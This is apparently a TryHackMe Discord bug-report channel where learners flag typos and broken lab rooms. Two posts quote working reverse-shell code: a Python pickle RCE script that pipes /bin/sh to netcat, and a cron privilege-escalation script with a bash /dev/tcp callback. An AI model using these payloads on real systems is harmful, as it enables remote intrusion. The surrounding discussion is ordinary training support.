Metasploit room - msfdb init cannot be ran due to the attackbox not having PostgreSQL installed, or by not having initdb or pg_ctl added to path

haughty idol
#

the autopsy room is private

#

not a bug per-se, did A LOT of googling for this one

jade knot
#

In Splunk 101 room, Task 6 question 1 - Splunk query provided by uncoder.io has changed and is no longer accepted as a correct answer

wheat fractal
#

Is it just me or OWASP Juice Shop room gives no points at all? Just completed the room to see the same amount of points I started it with 😛

haughty idol
#

the chart

#

and the scoreboard i guess, never looked at that

#

far as i can tell only rooms with those tabs at the top give points: chart, scoreboard, writesups, whatever

wheat fractal
# haughty idol <@456226577798135808> dont think so, as far as i can tell the rooms that give po...

I know how point system works. Btw, you can read more about it it here -> https://docs.tryhackme.com/docs/rooms/how-points-work/

Since OWASP Juice Shop is a walkthrough room, I should have been awarded with 25% of the available points towards my account and the 'all time' leaderboard. Yet, I was granted 0pts 😄

Completing rooms gets you a certain number of points. A breakdown of how questions are scored as follows:

eternal summit
eternal summit
#

Usually walkthroughs are marked as simple rooms, and challenges are not. Challenges will usually have the scoreboard to show competition

shadow crane
#

first one requesting "<" as part of it, but others are without, just made me spend 10 min on this 😄

#

XXE room

shadow crane
#

yep, all good now

#

tnx

wheat fractal
eternal summit
wheat fractal
livid escarpBOT
#

Gave +1 Rep to @eternal summit

wheat fractal
#

Could you please check if there is a mistake here or if I am misunderstanding something?
Jr Pentester Path
Nmap Advanced

wheat fractal
#
--2021-12-15 15:48:21--  http://10.10.49.77:8000/.flag.txt
Connecting to 10.10.49.77:8000... failed: Connection refused.```
eternal summit
#

@wheat fractal This is not a bug. Please ask in #room-help

trail merlin
#

Very minor typo in room "Weaponization". In Task 5 when creating the meterpreter payload, the instructions are to set LPORT 433 but then when setting up the listener, it says to use LPORT 443. Just a small thing that could cause some frustrations if someone misses it.

glad badger
livid escarpBOT
#

Gave +1 Rep to @trail merlin

rugged canyon
#

solar-log4j task 8:

For other techniques, you are strongly encouraged t do your own research. There is a significant amount of information being shared in this Reddit thread: https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/
has a typo at the marked location where it should say to but only says t

and then same room in task 10:

Please be understanding of this frenzy. There are so many potential places that this log4j vulnerability could be present, we may never see the end of this vulnerability for a long, long time. The onus is on you, on me, on each and every one of us to raise awareness of this incident, and hold the community accountable for actively responding. When the time comes, roll out the patches that have been made available and continue to hunt for instances of this vulnerability. It takes a village.

#

the second one says onus instead of something shadow dunno what it is supposed to say

tender mountain
#

Type in room "Solar, exploiting log4j", First paragraph of task 1 reads: "offers remote code trivial remote code execution", the first "remote code" should be removed.

haughty idol
#

@rugged canyon onus is a word means like your responsibility

#

thats is correct

#

if my house is a mess...the onus is on me to clean it

rugged canyon
#

huh today shadow learned thanks @haughty idol

livid escarpBOT
#

Gave +1 Rep to @haughty idol

haughty idol
#

duty or responsibility i think it means

#

not a very common word i think

rugged canyon
#

yeah not very common word

#

shadow thought the sentence was gonna read

the responsiblity is on us, is on you, on me, on each and every one of us......

strange escarp
#

Room "Solar, exploiting log4j", Task 5: Download file missing. If you open the dropdown to install Java 8 locally, it says: Select the jdk-8u181-linux-x64.tar.gz package (or alternatively, download the file attached to this task, added for your convenience). However, there is no file attached to this task. Downloading the file from the linked mirror took about 3-4 hours... 😴

haughty idol
#

not really a bug but https://tryhackme.com/room/subdomainenumeration asks you to start a machine in the 1st task...and that machine is not used for anything. The rest of the tasks have you just answer general questions or run commands in a split web view thing. I did recon and stuff and found a few things, wondering if those are easter eggs left for the user to find or were they supposed to have a purpose a long with the machine itself?

snow rain
#

https://tryhackme.com/room/owasptop10

Task 26 refers to a github page that has been overwritten into a unrelated cloud app. “copy-and-paste the source code from this Github page”
https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3

Here is the original code meant for the room.
https://github.com/WCEHouck/Python_RCE/blob/main/rce.py

import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))

print(base64.b64encode(pickle.dumps(rce())))```
wheat fractal
#

Nmap, Post Port Scans, Task 4
Can you figure out the name for the script that checks for the remote code execution vulnerability MS15-034 (CVE2015-~~2015-~~1635)?

wheat fractal
#

Jr Pentester
Protocols and servers
POP3

How many email messages are available to download via IMAP POP3 on XX.XX.XX.XX?

crude token
rotund lava
#

I'm working through Common Linux Priv Escalations - Task 4, none of the users on the target machine have any cronjobs. But it was easy to get the answer with the hint.

eternal summit
rotund lava
gritty crown
#

Hi! It seems like in the MAL: Researching room (https://tryhackme.com/room/malresearching) there is a typo in Task 3 Question 4. The question should ask how long will it take for 6 "billion" (not million) files to be hashed

digital plume
#

in agentsudoctf, the image filename in ||james'|| home directory is misspelled ||Alien_autospy.jpg||

strong arrow
#

(AoC3, Day 16) Why does it say Darknet? Isnt it caled Deep web (everything not accessible by a search engine, for example sites behind login pages for schools, or onion sites, also refereed to the part of the iceberg that is under water)

obsidian kiln
#

In other words, they both exist, and the description in the room is correct

strong arrow
obsidian kiln
strong arrow
# obsidian kiln Same difference smh

No they are not the same:

Darknet: ```
A dark net or darknet is an overlay network within the Internet that can only be accessed with specific software, configurations, or authorization, and often uses a unique customized communication protocol

https://en.wikipedia.org/wiki/Darknet
Darkweb: ```
The dark web is the World Wide Web content that exists on darknets: overlay networks that use the Internet but require specific software, configurations, or authorization to access
``` (TL;DR the content)
https://en.wikipedia.org/wiki/Dark_web

A dark net or darknet is an overlay network within the Internet that can only be accessed with specific software, configurations, or authorization, and often uses a unique customized communication protocol. Two typical darknet types are social networks (usually used for file hosting with a peer-to-peer connection), and anonymity proxy networks s...

The dark web is the World Wide Web content that exists on darknets: overlay networks that use the Internet but require specific software, configurations, or authorization to access. Through the dark web, private computer networks can communicate and conduct business anonymously without divulging identifying information, such as a user's location...

obsidian kiln
#

But yes, if we are being very specific, sure, Network applies to the infrastructure, and Web applies to how the infrastructure is used

#

If I say that "I need TOR to access the dark net", it would be just as correct to say "I need TOR to access the dark web" -- just that the first refers to accessing the infrastructure, and the second refers to accessing the content on that infrastructure

#

Both result in me accessing information from it

strong arrow
#

ah, ok 👍

rugged canyon
#

as long as people don't mix deep web and dark web shadow is happy

#

deep web = anything not indexed by search engines
dark web = requires special software like TOR to acccess

strong arrow
#

btw in the google dorking section it does not mention what order it is in. is it YYYY-MM-DD or is it YYYY-DD-MM

rugged canyon
#

oh yeah that is a good idea to maybe add

obsidian kiln
#

@twin tapir

#

Fix

rugged canyon
#

but shadow would assume YYYY-MM-DD as that is the standard set by iso in iso 8601

strong arrow
#

why do you talk in the third person?

rugged canyon
#

old habit

strong arrow
#

k

glad badger
wheat fractal
#

Not sure if its a bug or not, but i just completed OWASP juice shop and i didnt get a single exp point for that

haughty idol
#

i have tried every possible nnamp scan and that 0% doesnt move, ive also tried them all from an attackbox with same results. Looking at the console I get Firefox can’t establish a connection to the server at ws://10.10.6.89:8080/socket.io/?EIO=4&transport=websocket&sid=CUe16GrASi1uS1qfAAAQ. errors every second its looking like

void vortex
rotund lava
#

I'm doing the Linux PrvEsc room - Task 1 - I spin up the target VM. My VPN is setup and I can ping the target IP. But when I attempt to ssh to the machine I receive the following error:

"Unable to negotiate with 10.10.27.198 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss"

So I had to add the HostKeyAlgorithms option to login to the target VM:

ssh -oHostKeyAlgorithms=+ssh-dss user@<ip>

Cheers!

lusty wren
#

Hi, I've done the Nax room and rooted the box but it won't accept my answer for the Metasploit path (even though I'm pretty certain it's correct) so I can't collect the points for the room. Could someone who has done it have a look and tell me if I'm being stupid or not?😆

glad badger
lusty wren
#

just trying an update now

lusty wren
glad badger
haughty idol
#

@void vortex after speaking with someone in another room I did try from the attackbox and the flag came up right away. Thanks 🙂

livid escarpBOT
#

Gave +1 Rep to @void vortex

lusty wren
glad badger
dark rover
#

Unsure if this is a bug or intended, but while taking the XSS room, I keep getting a random (to me unexpected) connection

root@ip-10-10-72-32:~# nc -lvnp 8081
Listening on [0.0.0.0] (family 0, port 8081)
Connection from 34.77.162.6 49909 received!
GET / HTTP/1.1
Host: aparat.com.leta.aparat-com.aparat---com.aparat--com.gq
User-Agent: Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com

Can anyone let me know if this is intended or something weird going on?
I'm running the AttackBox in the browser

eternal summit
dark rover
eternal summit
#

They're internet connected

#

Not NAT'd etc

dark rover
#

Well they have an RFC1918 IP so there's NAT going on in AWS I'd assume
But okay, I guess I'll just be annoyed by randoms scanning me while I'm trying to work on rooms
Thanks

eternal summit
#

When it's something easy to verify, why assume?
Also you can listen on a specific address/interface

dark rover
#

Huh, okay
Sorry, just thought there was something in place and thought it was a bug possibly, but I guess allow all works well
Sorry for disturbing, was just trying to figure this out
Thanks!

rugged canyon
eternal summit
#

Cc @glad badger quick one for you

glad badger
#

🎄 Fixed 🎄

strong arrow
#

AoC3 Day 18, where was the -v flag used?

rugged canyon
#

in the image below that text line @strong arrow

strong arrow
#

ah ok

rugged canyon
#

or wait that is not a image apparently as you can copy text from it..... well the mockup terminal window then

strong arrow
#

kinda confusing that here is something showing the command, then it mentions something that is not in the command, but it works, I guess.

strong arrow
#

On the file inclusion the question answer on Task 3 (Path Traversal) is allows file_get_content when it's supposed to be file_get_contents

obsidian kiln
strong arrow
obsidian kiln
#

Well, in that case: it's answer tolerance

#

Refresh the page and it will have the real answer

#

(Bonus points if you can find the actual problems in that room though)

haughty idol
#

the 1st sentence, not sure what this is supposed to mean:
Than sort of be exploited automatically.

wheat fractal
eternal summit
tepid bay
#

Room: webosint (https://tryhackme.com/room/webosint)
Task 2: What country is listed for the registrant?
Bug: Namecheap's address is updated to ["Kalkofnsvegur 2","Reykjavik","Capital Region","101","IS"] from Panama. Its time to update the Question's answer as well!

deft anvil
#

Room: https://tryhackme.com/room/brainstorm
Bug: FTP
Behavior: unable to use dir and ls commands once connected to the FTP anonymous login.

**Room: **https://tryhackme.com/room/internal
Bug: unstable machine https://tryhackme.com/room/internal
Behavior: machine out of reach
Note: I troubleshoot the THM .ovpn and determined it had nothing to do with ti, I believe it is related to the VM or where the machine is being hosted.

wheat fractal
silver badge
#

**Room: **Extending your network
https://tryhackme.com/room/extendingyournetwork
Task 2: Firewalls 101
The answer for the first question is different than the one given in the video guiding
||In the video the answer is Layer 3, Layer 2.
But now the right answer is Layer 3, Layer 4.||

tepid bay
deft anvil
deft anvil
# wheat fractal Ah must be a thm bug

not the first ones I've found, I have found about 5 - 7 across all paths and I haven't report them because I have found my way through but it is a total waste of time for a beginner since they would probably think they are doing something wrong or/similar etc..

I have learned that tryharding VM's will get you nowhere for example: tryhackme, what you want is to be able to apply the concepts taught to something/practice and if for some reason the THM VM is not being functional because of a bug or something that is out of our own control the best thing to do is build up the classroom or the practice scenario yourself and there are a tons of free resources online to build controlled practices.

for example: in the case of Brainstorm I download vulnserver on a windows 10 machine, install immunity debugger and start the whole buffer overflow process.

  • spiking: find the vulnerable part of the program
  • fuzzing: breaking the program
  • finding offset: overwriting the pointer address
  • finding bad characters
  • finding the right module
  • generating shell code
raw field
haughty idol
#

though its not, if you run the scan they tell you, your results should be different than that imnage

#

and port 68 dhpcd cannot be the answer because its in that image so its not new

raw field
#

bruh when I ran the scan I only see port 68 and 111, maybe because of the machine IP?

haughty idol
#

@raw field looking at that room there are 3 machines, did you terminate the previous machine and star the machine for this task?

#

each one is different

#

make you started the correct machine for the task you are doing

untold pike
#

Hello, all.
I thinks this is a bug in https://tryhackme.com/room/linprivesc on the "Task 9 Privilege Escalation: Cron Jobs". It seems like cron doesn't work.
I changed ||backup.sh|| file to:

karen@ip-10-10-68-44:~$ cat backup.sh 
#!/bin/bash
#cd /home/admin/1/2/3/Results
#zip -r /home/admin/download.zip ./*
# nc 10.10.89.34 4444
echo "TEST" > /home/karen/test.txt
bash -i >& /dev/tcp/10.10.89.34/4441 0>&1

If I execute this file by

. ./backup.sh

I can see that test.txt file was created. But the backup.sh doesn't execute by crontab. I tried to create ||antivirus.sh|| in the home folder to test it. And again without any success. Is it crontab bug or I'm doing something wrong?

haughty idol
#

@untold pike did you look at /etc/crontab on the machine, i believe the machine is different than the examples? i could be wrong

#

starting the machine up so i can get a better idea of whats going on..

#

nvm, got into it and the examples are the same for the most part

#

hrm, doesnt look like the cron is running at all, had pspy64 running for like 10 minutes now

#

worked for me when i did it. maybe it did an upgrade and broke itself? i see unatttended upgrades running every few minutes

obsidian kiln
#

@glad badger sounds like cron is broken in Linux Privesc 🙂
Also, whilst whoever's fixing Alper's box is in there, they may wish to turn off unattended upgrades: that'll no doubt be slowing things down a bit...

haughty idol
#

@obsidian kiln yeah had pspy running for 20 minutes, the backup.sh fired off once, TONS of calls to /usr/sbin/CRON

#

dunno if thats causing the issue

obsidian kiln
#

Honestly? I ain't going in there to debug it rn 🤷‍♂️
It's a box developed by a (prior) member of the internal development team, and I have my own work to do. If I had a little more time I'd go and find the problem / sort a fix, but as it stands, it's something that will need to be handled by QA

haughty idol
#

i do sort of remember having issues with a box and cron jobs, had to restart the box multiple times before the cron ran correctly

#

cant recall if it was this one but yeah, every minute about 10 or so calls to /usr/sbin/CRON -f

obsidian kiln
#

By all accounts there are more than a few issues with those boxes. The fact that there's more than one in the room at all is unnecessary.
As I said though, it will need to be sorted by someone on the internal team at this point 🙂

haughty idol
#

cool, glad i could be of some assistance in figuring it out

zealous heart
wheat fractal
#

Complete beginner > network services > task 9 > question 1. It asks us how many ports are open by running an nmap scan which shows only 1 port is open. But it gets marked correct only when we write 2 in it

fringe thistle
#

@wheat fractal if you don't specify, nmap will scan most popular ports. Maybe second port is opened at an unusual port ?

#

As you can read from here

untold pike
fringe thistle
#

I was able to finish that room without having any bugs

#

Interesting

#

Of course I had to try so many things until I make it work but I thought problem is because of me

untold pike
livid escarpBOT
#

Gave +1 Rep to @fringe thistle

zinc estuary
#

heyyo, coming from phishing room 3: | https://tryhackme.com/room/phishingemails3tryoe |
Task 8, Q 5 asks for the windows process that was flagged as "Potentially Bad Traffic", but in the report the process was redacted. i surfed around a bit and couldn't find the answer, so posting here as a bug.

#

snapshot of the redacted info

digital plume
#

relevant room, did a wfuzz directory search on the second web server. the web server crashed after a while

formal prawn
#

Hi, I think I've identified an error in the Solar room

#

In Task 5, Trouble shooting information, it states that;

#

Revisit your HTTP server.

  1. Ensure it is in fact running.
  2. Ensure it is running in the same folder as your Exploit.java file.
#

But doesn't the Exploit.java needs to be Exploit.class, since this is the compiled exploit?

#

@little merlin (tagging you since you appear to be the creator)

little merlin
#

Ah, sure thing.

haughty idol
#

hi @little merlin

#

great site you got here 🙂
finally getting into cybersecurity after watching your video on the 1st about he AoC. Been having lots of fun 🙂

little merlin
#

Kudos to all the THM folks, TryHackMe is their baby 😛

brittle yarrow
#

am i crazy or is thare no start box ?

#

at Task 14 [Day 9] Networking Where Is All This Data Going

#

nvm

jade knot
#

MAL: Strings room, Task 4, Q1 - the number of transactions is outdated.

humble wigeon
#

Edit: Nevermind: There's a WAY less obvious answer that's "correct". Still, I consider this to be at least a problem with the question.

Hey, I think there might be a bug in the "Red Team Recon" room (https://tryhackme.com/room/redteamrecon)

In Task 6, there's the following question:
censys_email_address is a module that “retrieves email addresses from the TLS certificates for a company.” Who is the author?

The answer is relatively easy to obtain, but not accepted. I tried various options, but I believe there to be an error.

digital plume
#

in linuxfundamentalspart2 the important file has read permissions for other, allowing to read it without actually switching to user2 as instructed.

lunar spear
#

Just FYI - The CC: Pen Testing room has had a couple of glitches.

Task #17, Question #6 doesn't come up with a flag. Only <blank>.

hazy tiger
#

Task #17 -> Your version of sqlmap is broken, download the one from the official sqlmap github

lunar spear
#

Cheers!

#

Yep that worked

wheat fractal
#

i think splunk101 room has a bug in task 6 where it doesn't accept correct answer for a sigma rule.

fading idol
#

AoC day 21

#

the result is 1, but the answer is 0

#

*last question of Day 21

unique ingot
#

because the zero in the yara file is not a zero but an "O"

#

details details 🙂

#

"yara code"

#

so change the "O" to a zero and you'll get the correct answer 🙂 @fading idol

gritty mason
brave prism
#

linuxfundpart1v1, Task 4. On my VM (vnc.tryhackme.tech) username is 'root' but correct answer is 'tryhackme'. And 'commend' instend 'command' in 'Hint'.

eternal summit
brave prism
#

oh, thanx!

ebon gyro
#

Hello, I've been working on this question from 'Burp Suite' room for a long time and have yet to discover an answer. I followed the instructions and even examined the writeups, but I still couldn't figure it out.
Answer validation for this question seems to have some bug(?), since it is not accepting the correct response. Could you please look into this and provide me with a solution to this question?
Thank you in advance.
Task 9 --> Help! There's an Intruder!

Q-->
Finally, click 'Start attack'. What is the first payload that returns a 200 status code, showing that we have successfully bypassed authentication?

marsh flare
fickle phoenix
fickle phoenix
torpid cairn
#

Hi! I think I found a bug in an answer form

torpid cairn
silk temple
#

Is this supposed to be like this? Can't answer most of the questions room/ctf

eternal summit
livid escarpBOT
#

Gave +1 Rep to @eternal summit

severe gorge
#

is the Nax room broken ? just cant get the exploitation module - then looked at walkthroughs and entered what they got and still doesn't work

calm lantern
#

Task 22 [Day 17] Cloud Elf Leaks

#

ids : identifiers not intrusion detection system .
correct me if i am wrong

#

is this the right place to say this ?

unique ingot
#

The day 22 task on AoC2021 wont run the oledump.py it returns only blank.

frozen pond
#

I think the following sentence in the room "Red Team Recon" should be: "The final tool that ships with Unix-like systems is traceroute, or on MS Windows Systems, tracert"

strong arrow
#

AoC3 Day 22 the example use of oledump.py wont work, how a python program is run is by first running the python cli tool than telling it what file to run python file.py so how it is shown in the example does not work

pearl hare
#

if in the beggining of the file you have #!/bin/python

obsidian kiln
#

Both Windows and *nix can handle scripts being run without specifying the interpreter

#

Windows does it by registering the file extension to the interpreter (e.g. anything with .py goes to the Python interpreter). *nix uses a "Shebang", which is what Yuri said above

#

Usually something like:

#!/usr/bin/env python3

for python

strong arrow
#

tf, when i tested it earlier it did not work, but now it works

but its probably a good idea to use the python cli tool instead of relying on someone adding #!/usr/bin/env python3 to their script

obsidian kiln
#

That's on the developer, not the person running it

#

Nearly every competent dev will add a shebang if it's a multi-platform script (which virtually all will be)

#

And that's Windows anyway, so it's to do with the .py extension, not the shebang

#

My bet would be that when you tried it earlier you weren't in the correct directory, and whoever set that box up didn't bother changing the PATH variable

strong arrow
obsidian kiln
#

Then 🤷‍♂️

void spruce
gray wing
#

Past few days on my attack box... The cursor is turned like a square thing and ... Control key isn't working

rustic raptor
#

some of the questions in the network services 1/2 are taking my fat finger answers as correct. lol

hazy tiger
#

Answer tolerance

#

If questions are 95% correct they’ll be accepted

#

Refresh and your page will update

rugged sparrow
#

Evening 🙂 in AoC2 - Task 19 theres a hint (second last question) telling me to go to "https://scylla.sh/" - that website does not work anymore.

#

atleast not for me. If someone could test it as well that would be great 🙂

rustic raptor
livid escarpBOT
#

Gave +1 Rep to @hazy tiger

rugged sparrow
ionic cradle
#

Room: Advent of Cyber 2021
Day 13: Question "What is the content of the flag.txt file?"

After opening the reverse shell and "cd" into "C:\Users\thegrinch\Documents", the file "flag.txt" seems to have the wrong content (no THM flag)

Oh and I didn't want to spoiler with "Schedule.txt" I just wanted to show that the 2nd file works. 😅

digital plume
#

in overpass3hosting the web flag is owned by root, not by apache. the hint says it's owned by apache. I used find -uid 48 to try and find the file, and of course it didn't show up. the web flag was the last flag I found after getting root shell :/

eternal summit
#

Closed, not a bug.

wanton zealot
#

Advent 3 - > days 22 and 23 cannot copy out of machine into the left of split screen. Several people had the issue, there is no left thingy to open clipboard, ctrl shift c does not work either.

oak mulch
#

Not entirely sure if this is a "bug" per se but I'm throwing it in here just encase.

Room: RPMetasploit
Task: 7, Question 2
Description:

Question asks you to search for server/socks5 in metasploit and doing so in the MSF6 version I've got brings up no results. Searching for just simply "SOCKS" results in "socks_proxy", "socks_unc", and "sockso_traversal" but the auxiliary module "socks5" didn't seem to exist. Looking into the MSF documentation, as of January 20th, 2021 it seems they have removed the auxiliary/server/socks5 module stated here: https://docs.rapid7.com/release-notes/metasploit/20210120/ PR:14566

Possible Solution:

The changes seems to indicate that "socks4a" and "socks5" have been merged into "socks_proxy" thus the new answer would then just simply be "socks_proxy" for those running MSF updated beyond January 20th, 2021.

winter meadow
#

room AOC2021 day 19 fishing there is a bug I discovered with a typo spoiler for 1 question

#

password-reset-instructions.pd is a good answer missing the F on the end

winter meadow
livid escarpBOT
#

Gave +1 Rep to @flint robin

winter meadow
void spruce
restive sparrow
#

Room is kenobi
There are 11 open ports
Unexpected, ||it ain't the answer even||

#

The attack nox needs an update
Searchsploit is showing only 3 exploits , while there are 4 in updated versions

#

DM me for details

wanton zealot
# flint robin use RDP?

I was not able to male that work. That is also a workaround, and does not invalidate there being a bug.

wanton zealot
flint robin
#

@wanton zealot it's not exactly a bug, the machine opens in split screen, the clipboard feature you're talking about is an attackbox feature.

celest dune
#
placid sinew
wanton zealot
flint robin
wanton zealot
#

I KNOW

#

I MENTIONED IT BECAUSE A LOT OF REPLIES IN #910210693821780018 WERE PEOPLE MENTIONING THE LEFT SIDE THINGY.

#

I MENTIONED IT TO HEAD OFF THAT AS A MISGUIDED "FIX". NOT TO CONFUSE YOU.

#

The bug that I am attempting to report is that no copy paste is working for several people in and out of there.

#

It does not not-work for everyone, but for a lot of people.

eternal summit
#

Please, both of you chill out.

#

You've reported it, please leave it to tryhackme staff to deal with

rose helm
#

Hello guys

#

I am new member

haughty idol
quartz swift
#

Hello, the HackPark room (https://tryhackme.com/room/hackpark) machine does not seem to be coming up, have terminated and tried again and checked access to machine with OpenVPN and attackbox but neither is pinging.

eternal summit
#

Windows Server firewall blocks pings by default

stone jolt
#

tryhackme investigating windows 3.x walkthrough is this task anyone completed please dm so many doubts thier

hollow parcel
#

Same problems for me

vagrant acorn
#

Hey! Found bug with table in Pentesting fundamentals task 3

eternal summit
vagrant acorn
#

Oh, I didin't mark it. There's third column right here, and I think that some text is missing

formal cape
#

Where is the appropriate channel to report when you think a challenge room is not spinning up correctly? Is it here or #room-help?

eternal summit
#

#room-help is for requesting help after you've checked writeups

formal cape
eternal summit
#

I think I've seen a few other people report that

formal cape
#

I've tried restarting the VM several times, and tried checking port 6443 from both my own VM and the attackbox

#

I completed this room previously and it worked. But I was trying to help someone who hasn't and they never see the port come up.

#

I can confirm I now see that too.

#

So I am wondering if somehow something is b0rked. I reached out to tabby on Twitter but haven't heard back just for a confirmation, just in case she didn't change the port or something. But a full nmap doesn't pick up anything suspicious, and my original writeup doesn't have me showing anything but the normal port in use.

eternal summit
#

Are you currently a subscriber?

formal cape
#

Yes I am

eternal summit
#

Ok, that makes resource issues slightly less likely but it might have lost a resource boost

formal cape
#

I was hoping someone else could try spinning the room up, wait 5 mins and nmap 6443 and see if its closed to them as well.

#

I decided to move on and walk through Throwback, but I can retest the room later if anyone has other ideas to try to figure out why the port never comes up. Maybe kubernetes is just too starved to start.

wheat fractal
#

Hi guys

#

I have problem with the next question in "Windows Fundamentals 1" >> "Task 3":
Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?

#

You can help me?... I don´t know what is the answer, and i've tried the best

wheat fractal
#

Could be the hidden icons with an arrow icon, keyboard icon, lenguage icon... :'c

fervent arrow
#

Im also facing the same issue in privesc part exactly like you
I got the cap file, but whenever i access it it says permission denied

Plzz do check once !!

muted panther
eternal summit
muted panther
eternal summit
muted panther
#

Ah I see, my bad
Didn't realise it has additional functionality, I was looking at the help page for a command that displayed options as the room asked but couldn't find one so I just tried the one that says modules, didn't know it was actually used for options too

unborn crater
#

Hey are you there ? i have a question on a CTF, i can't continue my learning xD

#

I hope you can help me

#

I don't know if i can ask my question here or no cause it could be a spoil

#

okay thank you

eternal summit
white wren
#

The room name: Cyber Scotland 2021 has and domain name error that lead to render no css and plugins.

tender sundial
#

Found a bug in "Phishing Emails 3". Task 8 asks "What Windows process was flagged as Potentially Bad Traffic"
When going to the provided URL, that process is redacted, I have tried every other process listed as running in the sandbox however none of them are correct.

dusky junco
obsidian kiln
glad badger
tender sundial
glad badger
zenith mortar
#

Hi i got a bug in this room

#

task 8 question 3

#

the bug is, if i use in this question confirm pop-up window instead of alert it wont show me the flag

halcyon bridge
#

Hi, I'm seeing an issue with Retro / Blaster right now. When trying to execute a part of the priv esc task, there's an issue with selecting the browser to use from both a windows and linux platfrom the issue is happening.

grave knoll
#

Hola! I'd like to point out in one of the newer rooms that may mislead folks. I don't want to potentially spoil anything and I re-read the rules, but I just banged my head on this for a few minutes and would like to potentially save others the hassle if possible.

brisk fossil
#

Hi also with Blaster there is a bug that there is not internet history, so room is not complete.

eternal summit
eternal summit
grave knoll
livid escarpBOT
#

Gave +1 Rep to @eternal summit

eternal summit
grave knoll
#

Schweeet! This was a good series. Thanks, y'all!

brisk fossil
eternal summit
#

It's been previously closed as WontFix

#

Because you still have a lot of clues

wintry thunder
#

Hi there 👋
Who can I ping to report a possible bug ?

obsidian kiln
wintry thunder
#

with answers ?

#

I misspelled the word and still worked

#

I just reset room and fixed that typo

obsidian kiln
#

That's answer tolerance (i.e. intended)

wintry thunder
#

Thanks

obsidian kiln
#

Basically there to make sure that if you type out a long flag and make a mistake you aren't penalised for it 🙂

wintry thunder
#

Much thanks! Enlightened

atomic nexus
#

Heyo, I'm running through https://tryhackme.com/room/rpmetasploit, Task 7, Step 2, quote "run the command search server/socks5. What is the full path to the socks5 auxiliary module?".

Problem being: According to my research, in msf6, this module exists no longer and has been presumably replaced by socks_proxy.

#

So while the answer to T7, S2, can be gotten, it's still... meh.

#

Oh, and autoroute is deprectated, so someone might want to get the "Makin' Cisco proud" description up-to-date before it is fully superseded by post/multi/manage/autoroute

obsidian kiln
waxen hamlet
#

i am stuck at converting process of my vm machine

#

can anyone help!

burnt dune
burnt dune
tawny horizon
vernal stratus
#

Content Discovery room machine not working for me, it assigns me an IP but the webpage doesn't work

brittle yarrow
#

Hi guys i'm working on the room Linux Fundamentals Part 3 at Task 4 question 3 I'm doing the right steps but still got a error 404 that the file does not exist...

brittle yarrow
#

not a room hint needed I do exactly what the you-tube video asked me to do and still getting the same error

eternal summit
#

This channel is for when you're certain it's a bug. That room has been successfully completed so many times, and I know it's not bugged. It's something that you are doing wrong.

brittle yarrow
#

I will move the question but I do exactly what is asked.

dense garnet
gusty hull
#

Hi! In the room "Searchlight - IMINT" Task 9 is finding a hotel, but it's being demolished. It's still searchable, but don't think it's intentional.

twin tapir
#

Well that's interesting...

#

I don't think it would really affect any ability to do the room though?

slow epoch
slow epoch
#

Enjoy the room @gusty hull and happy new year

gusty hull
#

@slow epoch Thanks, Happy new year!

livid escarpBOT
#

Gave +1 Rep to @slow epoch

formal cape
#

And maybe make sure its clear if its GMT or not

#

SMTP RFC may expect it... but its not clear in the question.

#

Actually, to PROPERLY fix this the text SHOULD read: "What is tje r,ail's timestamp in GMT? (answer format: mm/dd/yyyy hh:mm)

#

Unless you are localizing dates per profile

wheat fractal
#

Pretty sure GMT is DD MM YYYY

eternal summit
#

Timezone doesn't specify date format

tame karma
#

Has anyone noticed that there is an issue with the "What layers of the OSI model do firewalls operate at" question in the "Extending your network" room? The answer in my opinion is ||layer 3, layer 4||. This answer is accepted as correct. The walkthrough video shows|| Layer 3, Layer 2||. So either my answer is wrong or the walkthrough is wrong. I'm pretty sure I'm right. Also, the hint says to enter them "in descending order." I entered ||"Layer 4, Layer 3"|| and it was rejected.

I think both the walkthrough and hint are wrong. Hopefully that can be fixed.

#

The answer to this question is clunky too. "What are the two different layers of switches? Separate these by a comma I.e.: LayerX,LayerY"

In this case, it wants the answers without any spaces. Spaces should probably be added for consistency.

wheat fractal
#

this is the correct answer i have looked all over the internet but tryhackme does not accept my answer what is the real answer

#

nax

#

8th question

flint robin
obsidian kiln
#

@dusky junco box threw off license ^^

rotund crystal
#

This is a really small thing but in the command injection room task 4 it should accept both sanitise and sanitize as an answer

wheat fractal
#

In the ice room, there are several issues : the process architecture is x86 and not x64 as mentioned (though the system infrastructure is x64 and you can make a lateral migration to a x64 process), the exploit suggester in metasploit won't suggest the correct privesc exploit, but only "exploit/windows/local/ms10_092_schelevator" (didn't check whether it could work that way)
Otherwisz, great room !

obsidian kiln
hazy tiger
# obsidian kiln Why? Sanitize isn't correct 🤷‍♂️

While I don't know the answer, if it's a whole British English vs American English issue, I think that both should be accepted anyway.
I'm not sure why regex isn't allowing them both but having both spellings accepted would be better (unless it directly says in the room task sanitize or sanitise because that would be a reader fault).

gusty halo
flint robin
#

@gusty halo its against the rules to DM without explicit permission.

eternal summit
livid escarpBOT
#

Gave +1 Rep to @eternal summit

obsidian kiln
hazy tiger
#

¯_(ツ)_/¯

muted panther
robust niche
#

"Phishing Emails 5" The question: "What is the email's timestamp? (answer format: dd/mm/yy hh:mm)" The answer format is incorrect, it should be mm/dd/yyyy hh:mm

ornate stirrup
versed yoke
#

Room: Phishing Mails 5

Question: #1
Issue: The provided answer format in question #1 is incorrect.

Description: The answer format listed on THM is dd/mm/yy hh:mm but this is incorrect and misleading to the user as the accepted answer follows mm/dd/yyyy hh:mm format.

hallow haven
#

Room: all in one

On port 80 i can't view the page ore use gobuster. Via telnet it say local 127.0.1.1

I have Google a walkthrough and it will show a default page on port 80.
But it just keep loading all the time. And nothing shows

wheat fractal
#

Hi all, could anyone give a hand with room network services? Im trying to connect thru Port 21 but my scan with nmap lists it as closed...which is the whole point of the exercise

eternal summit
wheat fractal
livid escarpBOT
#

Gave +1 Rep to @eternal summit

wheat fractal
#

ok. thanks!

simple citrus
wheat fractal
#

hi all! what room am I supposed to go to if the exercise isn't working as I am told but I am not **certain **that it is a problem/bug with the room/exercirse?

wheat fractal
#

checked as well 👍

lost cove
#

Windows event logs room is broken for task 4

